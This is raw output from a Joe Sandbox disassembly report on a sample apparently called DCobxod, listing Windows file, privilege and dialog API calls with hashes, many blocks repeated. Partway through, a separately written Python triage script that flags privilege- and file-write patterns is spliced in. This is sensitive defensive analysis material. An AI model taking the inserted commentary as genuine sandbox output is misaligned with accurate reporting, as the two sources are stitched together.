                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9cac69b61d3cc2f9459a49d7631e181f7ed2f371fc664e68b2d2c07d042a9a36
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 9cac69b61d3cc2f9459a49d7631e181f7ed2f371fc664e68b2d2c07d042a9a36
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0a457e84263c6c6c98d77b4c3a4303f1ca8bd874f97144826432f264afdb95be
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 0a457e84263c6c6c98d77b4c3a4303f1ca8bd874f97144826432f264afdb95be
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fa57e8efa6d058c05b9eee2dee6c0229589bed9e4cdca9e07428881e0e68036e
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: fa57e8efa6d058c05b9eee2dee6c0229589bed9e4cdca9e07428881e0e68036e
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fbf6687cbf1bed917e70a137fad97430a048c1c075d61465321af869dfeb4683
                                                              • Instruction ID: 203d40651cdd8d03294ba94bf44da3c3e97bf45c8220cad321fa1a27a78a419c
                                                              • Opcode Fuzzy Hash: fbf6687cbf1bed917e70a137fad97430a048c1c075d61465321af869dfeb4683
                                                              • Instruction Fuzzy Hash: 55A011C23AA0203C300822A33C02C3B020CC0C2B2A3B2822FF80082080B88C088A083E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: cb7da67b663c0b873019832a2876e5246808305bbf2b27c7d9a787221c2cded5
                                                              • Instruction ID: c3bd6a4be92b5f672a07bebbce8cfa028d5cfc5037bcac5796e9a6925bfce051
                                                              • Opcode Fuzzy Hash: cb7da67b663c0b873019832a2876e5246808305bbf2b27c7d9a787221c2cded5
                                                              • Instruction Fuzzy Hash: D1A012C136A0217C300421933C02C37010CC0C1B54372841FF40181080B84C0845043D
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f6cf683930e2225f8efa27874aa385125c9de6b229e26876fbe5692560ac977d
                                                              • Instruction ID: c3bd6a4be92b5f672a07bebbce8cfa028d5cfc5037bcac5796e9a6925bfce051
                                                              • Opcode Fuzzy Hash: f6cf683930e2225f8efa27874aa385125c9de6b229e26876fbe5692560ac977d
                                                              • Instruction Fuzzy Hash: D1A012C136A0217C300421933C02C37010CC0C1B54372841FF40181080B84C0845043D
                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0041903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00419F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: 1e7281510447f289e3ee52b5e67e64293a9b650472413fedcaf3926af7443a64
                                                              • Instruction ID: 26d34109368d939569f500bf89a66a9190a5703f2e21db6e3de3034b590f7924
                                                              • Opcode Fuzzy Hash: 1e7281510447f289e3ee52b5e67e64293a9b650472413fedcaf3926af7443a64
                                                              • Instruction Fuzzy Hash: 02A0113808000A8A8E002F30CA0800C3B20EB22BC230002A8A00ACA0A2CB22880B8A00
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,0042AE72,C:\Users\user\Desktop,00000000,0045946A,00000006), ref: 0042AC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: d52353ff2f87e5a6ab667262e00abadde9b9584d6c73d2d9993b4a4194478b71
                                                              • Instruction ID: 08e9c110eb758c653a3a5c39afd47260cb9c6f83e0fa99780179892ee9dce05a
                                                              • Opcode Fuzzy Hash: d52353ff2f87e5a6ab667262e00abadde9b9584d6c73d2d9993b4a4194478b71
                                                              • Instruction Fuzzy Hash: 45A011302002808BA2000F328F0AA0EBAAAAFA2B02F00C038A08080030CB30C830AA08
                                                              APIs
                                                              • CloseHandle.KERNELBASE(000000FF,?,?,004195D6,?,?,?,?,?,00442641,000000FF), ref: 0041963B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: ccf39a55c55a62838a00c3663ef3a21cd3e90607948ad5d1377efb6a2aed819e
                                                              • Instruction ID: 02ca065ec4590d0748216d83b5d8091a68a569116cbb30fd6b78a43b545efb03
                                                              • Opcode Fuzzy Hash: ccf39a55c55a62838a00c3663ef3a21cd3e90607948ad5d1377efb6a2aed819e
                                                              • Instruction Fuzzy Hash: 5FF08970485B159FDB308A24C4687D377E86B12326F045B1FD4E643AE0D7696DCD8A54
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0042C2B1
                                                              • EndDialog.USER32(?,00000006), ref: 0042C2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 0042C2E0
                                                              • SetFocus.USER32(00000000), ref: 0042C2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0042C321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0042C358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042C36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0042C3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0042C3D4
                                                              • _swprintf.LIBCMT ref: 0042C404
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0042C417
                                                              • FindClose.KERNEL32(00000000), ref: 0042C41E
                                                              • _swprintf.LIBCMT ref: 0042C477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0042C48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0042C4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0042C4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0042C4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0042C509
                                                              • _swprintf.LIBCMT ref: 0042C535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0042C548
                                                              • _swprintf.LIBCMT ref: 0042C59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0042C5AF
                                                                • Part of subcall function 0042AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0042AF35
                                                                • Part of subcall function 0042AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0044E72C,?,?), ref: 0042AF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$PB$REPLACEFILEDLG
                                                              • API String ID: 797121971-2178673917
                                                              • Opcode ID: 5aa5370aa3e229e6bb78df8d78f92b2ce401f68be3245d5baa8bd37039be68ef
                                                              • Instruction ID: 6ab253dbce7845fd85ae7bf9e9721d753475412c0e536de9fcebc24e643d19ef
                                                              • Opcode Fuzzy Hash: 5aa5370aa3e229e6bb78df8d78f92b2ce401f68be3245d5baa8bd37039be68ef
                                                              • Instruction Fuzzy Hash: 2691D672644354BBD221DFA0DC89FFF77ACEB4A705F40482AF649D2081DB39A604877A
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00416FAA
                                                              • _wcslen.LIBCMT ref: 00417013
                                                              • _wcslen.LIBCMT ref: 00417084
                                                                • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
                                                                • Part of subcall function 00417A9C: GetLastError.KERNEL32 ref: 00417AF1
                                                                • Part of subcall function 00417A9C: CloseHandle.KERNEL32(?), ref: 00417B00
                                                                • Part of subcall function 0041A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641,000000FF), ref: 0041A1F1
                                                                • Part of subcall function 0041A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641), ref: 0041A21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00417139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00417155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00417298
                                                                • Part of subcall function 00419DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004173BC,?,?,?,00000000), ref: 00419DBC
                                                                • Part of subcall function 00419DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00419E70
                                                                • Part of subcall function 00419620: CloseHandle.KERNELBASE(000000FF,?,?,004195D6,?,?,?,?,?,00442641,000000FF), ref: 0041963B
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A501
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3983180755-3508440684
                                                              • Opcode ID: aa8c3a03e7f727312d4f7df5d9866e246922c147e9f37de13afadbc34125984c
                                                              • Instruction ID: dadb81b30dc14c74243ea353e2cffb2590083b1cd81c894d147b1034a0a752d6
                                                              • Opcode Fuzzy Hash: aa8c3a03e7f727312d4f7df5d9866e246922c147e9f37de13afadbc34125984c
                                                              • Instruction Fuzzy Hash: F9C1D771904208AADB25DB75DC41FEFB7B8AF08704F00455FF956E3282D738AA84CB69
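The block above is the one function in this listing that combines write-capable CreateFileW calls, a DeleteFileW subcall, the privilege names SeRestorePrivilege and SeCreateSymbolicLinkPrivilege, and the \??\ NT object-path prefix, yet the report presents it as raw IDA-plugin output that nothing on the page makes searchable. The Python below is an added example, not code from the report or from Joe Sandbox's tooling: it parses blocks in this layout into per-function records and flags the ones that show that combination. The embedded SAMPLE is a constructed, abridged copy of two blocks from this page; the regular expressions, the privilege list and the flagging heuristics are my own assumptions about the format, not a documented schema.

```python
"""Parse Joe Sandbox IDA-plugin function listings and flag file-system functions
that combine write-capable CreateFileW calls with privilege and NT-path strings."""
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of the listing above: an abridged copy of the
# CreateFileW block followed by the one-API CloseHandle block. Sample data, not a
# fresh capture; the Associated/.sdmp rows are omitted for brevity.
SAMPLE = r"""APIs
• __EH_prolog.LIBCMT ref: 00416FAA
• _wcslen.LIBCMT ref: 00417013
  • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
  • Part of subcall function 0041A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0041977F), ref: 0041A1F1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00417139
• CloseHandle.KERNEL32(00000000), ref: 00417155
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00417298
Strings
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
Similarity
• API ID: File$CloseHandle$AttributesCreateDelete_wcslen
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3983180755-3508440684
• Opcode ID: aa8c3a03e7f727312d4f7df5d9866e246922c147e9f37de13afadbc34125984c
• Instruction Fuzzy Hash: F9C1D771904208AADB25DB75DC41FEFB7B8AF08704F00455FF956E3282D738AA84CB69
APIs
• CloseHandle.KERNELBASE(000000FF,?,?,004195D6), ref: 0041963B
Similarity
• API ID: CloseHandle
• String ID:
• Opcode ID: ccf39a55c55a62838a00c3663ef3a21cd3e90607948ad5d1377efb6a2aed819e
"""

# Assumed row shapes (not a documented schema): "• Name.MODULE(args), ref: ADDR",
# "• Part of subcall function ADDR: Name.MODULE(args), ref: ADDR", "• Key: value".
API_RE = re.compile(
    r"^(?:•\s+)?([\w@]+)\.([A-Z0-9_]+)(?:\(([^)]*)\))?,?\s+ref:\s+([0-9A-F]{8})")
SUBCALL_RE = re.compile(r"Part of subcall function ([0-9A-F]{8}):\s*(.*)$")
KV_RE = re.compile(r"^•\s+([A-Za-z ]+?):\s*(.*)$")

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)      # (name, module, args, ref), direct calls
    subcalls: list = field(default_factory=list)  # (callee, name, module, args, ref)
    strings: list = field(default_factory=list)   # "String ID" split on '$'
    meta: dict = field(default_factory=dict)      # remaining "• key: value" rows

def parse_listing(text):
    """Split the listing into one FunctionBlock per 'APIs' header."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None or not line:
            continue
        sub = SUBCALL_RE.search(line)
        if sub:
            m = API_RE.match(sub.group(2))
            if m:
                cur.subcalls.append((sub.group(1),) + m.groups())
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(m.groups())
            continue
        kv = KV_RE.match(line)
        if kv:
            key, val = kv.group(1), kv.group(2).strip()
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            else:
                cur.meta[key] = val
    return blocks

# Privileges worth a second look when they appear as strings in a file-writing routine.
PRIVILEGES = {"SeRestorePrivilege", "SeCreateSymbolicLinkPrivilege",
              "SeBackupPrivilege", "SeTakeOwnershipPrivilege"}
GENERIC_WRITE = 0x40000000

def requests_write(args):
    """CreateFileW's second argument is dwDesiredAccess; '?' (unresolved) is not a write."""
    parts = [a.strip() for a in args.split(",")]
    if len(parts) < 2 or not re.fullmatch(r"[0-9A-Fa-f]{8}", parts[1]):
        return False
    return bool(int(parts[1], 16) & GENERIC_WRITE)

def triage(block):
    """Return the reasons a block deserves a closer look (empty list if none)."""
    reasons = []
    privs = sorted(PRIVILEGES & set(block.strings))
    if privs:
        reasons.append("privilege names: " + ", ".join(privs))
    if any(s.startswith("\\??\\") for s in block.strings):
        reasons.append("NT object path prefix \\??\\ (skips Win32 path normalisation)")
    writes = [ref for name, _, args, ref in block.apis
              if name == "CreateFileW" and args and requests_write(args)]
    if writes:
        reasons.append("CreateFileW with GENERIC_WRITE at " + ", ".join(writes))
    if any(name == "DeleteFileW" for _, name, _, _, _ in block.subcalls):
        reasons.append("deletes files via subcall")
    return reasons

def flagged(blocks):
    """(Opcode ID, reasons) for every block with at least one triage reason."""
    return [(b.meta.get("Opcode ID", "?"), triage(b)) for b in blocks if triage(b)]

if __name__ == "__main__":
    for opcode_id, reasons in flagged(parse_listing(SAMPLE)):
        print(opcode_id[:16], "->", "; ".join(reasons))
```

Run it against a full report export by replacing SAMPLE with the pasted listing; the Opcode ID is the stable key to carry into a similarity search across other samples. The dwDesiredAccess check is deliberately conservative: an unresolved `?` argument is not counted as a write, so a flag is a confirmed hit rather than a guess.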
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 5064a3a6a3c20f0608ac40e67da68e84f710f7eb6c2b83b324d8942eb2570e71
                                                              • Instruction ID: b02ea35041def15b4c76971c53f2f1d5f6dec9fca79a8e185a1a6c160591abfe
                                                              • Opcode Fuzzy Hash: 5064a3a6a3c20f0608ac40e67da68e84f710f7eb6c2b83b324d8942eb2570e71
                                                              • Instruction Fuzzy Hash: A7C26A71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
